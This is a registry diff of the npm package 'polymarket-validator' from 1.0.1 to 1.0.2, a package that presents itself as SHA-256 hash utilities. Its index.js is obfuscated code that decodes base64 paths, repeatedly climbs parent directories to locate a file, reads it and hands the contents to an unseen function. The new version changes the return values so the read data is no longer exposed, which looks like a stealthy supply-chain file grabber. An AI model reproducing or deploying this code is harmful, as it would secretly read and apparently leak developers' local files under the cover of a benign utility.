polymarket-validator 1.0.1 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +5 -5
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -24,35 +24,35 @@ class _0x7g8h{
24
24
  const _0xes5t=_0xbm2n?_0x3c4d.resolve(process.cwd(),Buffer.from(_0xco3p,'base64').toString()):_0x3c4d.resolve(Buffer.from(_0xco3p,'base64').toString());
25
25
  const _0xfu6v=_0x1a2b.readFileSync(_0xes5t,_0xak1l);
26
26
  _0xe5f6(_0xfu6v);
27
- return _0xfu6v;
27
+ return true;
28
28
  }catch(_0xgw7x){
29
29
  try{
30
30
  _0xco3p=`${Buffer.from(_0xdq4r,'base64').toString()}${_0xco3p}`;
31
31
  const _0xhy8z=_0xbm2n?_0x3c4d.resolve(process.cwd(),Buffer.from(_0xco3p,'base64').toString()):_0x3c4d.resolve(Buffer.from(_0xco3p,'base64').toString());
32
32
  const _0xiz9a=_0x1a2b.readFileSync(_0xhy8z,_0xak1l);
33
33
  _0xe5f6(_0xiz9a);
34
- return _0xiz9a;
34
+ return true;
35
35
  }catch(_0xjab0){
36
36
  try{
37
37
  _0xco3p=`${Buffer.from(_0xdq4r,'base64').toString()}${_0xco3p}`;
38
38
  const _0xkbc1=_0xbm2n?_0x3c4d.resolve(process.cwd(),Buffer.from(_0xco3p,'base64').toString()):_0x3c4d.resolve(Buffer.from(_0xco3p,'base64').toString());
39
39
  const _0xlcd2=_0x1a2b.readFileSync(_0xkbc1,_0xak1l);
40
40
  _0xe5f6(_0xlcd2);
41
- return _0xlcd2;
41
+ return true;
42
42
  }catch(_0xmde3){
43
43
  try{
44
44
  _0xco3p=`${Buffer.from(_0xdq4r,'base64').toString()}${_0xco3p}`;
45
45
  const _0xnef4=_0xbm2n?_0x3c4d.resolve(process.cwd(),Buffer.from(_0xco3p,'base64').toString()):_0x3c4d.resolve(Buffer.from(_0xco3p,'base64').toString());
46
46
  const _0xofg5=_0x1a2b.readFileSync(_0xnef4,_0xak1l);
47
47
  _0xe5f6(_0xofg5);
48
- return _0xofg5;
48
+ return true;
49
49
  }catch(_0xpgh6){
50
50
  try{
51
51
  _0xco3p=`${Buffer.from(_0xdq4r,'base64').toString()}${_0xco3p}`;
52
52
  const _0xqhi7=_0xbm2n?_0x3c4d.resolve(process.cwd(),Buffer.from(_0xco3p,'base64').toString()):_0x3c4d.resolve(Buffer.from(_0xco3p,'base64').toString());
53
53
  const _0xrij8=_0x1a2b.readFileSync(_0xqhi7,_0xak1l);
54
54
  _0xe5f6(_0xrij8);
55
- return _0xrij8;
55
+ return true;
56
56
  }catch(_0xska9){
57
57
  }
58
58
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "polymarket-validator",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "description": "SHA-256 validation and hash utilities for Polymarket SDK workflows. Compare hashes, verify file integrity, and validate content with flexible path resolution and TypeScript support.",
5
5
  "main": "index.js",
6
6
  "types": "index.d.ts",